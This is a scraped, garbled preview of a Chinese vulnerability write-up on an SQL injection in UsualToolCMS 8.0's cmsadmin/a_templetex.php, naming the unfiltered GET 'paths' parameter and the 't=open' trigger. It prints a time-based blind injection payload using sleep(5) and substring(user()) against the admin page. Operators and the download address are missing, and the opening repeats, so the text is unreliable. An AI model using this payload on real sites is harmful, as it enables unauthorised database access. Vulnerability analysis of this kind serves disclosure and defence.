UsualToolCMS 8.0a_templetex.php文件SQL注入漏洞分析.pdfVIP

  • 1
  • 0
  • 约4.76千字
  • 约 10页
  • 2026-09-28 发布于北京
  • 举报

UsualToolCMS 8.0a_templetex.php文件SQL注入漏洞分析.pdf

1.环境

环境版本信息:UsualToolCMS‑8.0‑Release

版本地址:

:

‑8.0‑Release.zip

2.分析

在./cmsadmin/a_templetex.php

文件第137行,paths变量过滤,第136行直接从

get获取paths参数,未做任何过滤处理

当从get获取的t参数值为open时,即可触发该SQL注入漏洞(见文件第129行)

构造

payload:cmsadmin/a_templetex.php?topenid=1pathstemplete/index

where

id=1and

if(ascii(substring(user(),1,1))0,sleep(5),1)‑‑+

1.环境

环境版本信息:UsualToolCMS-8.0-Release

版本:

:

文档评论(0)

1亿VIP精品文档

相关文档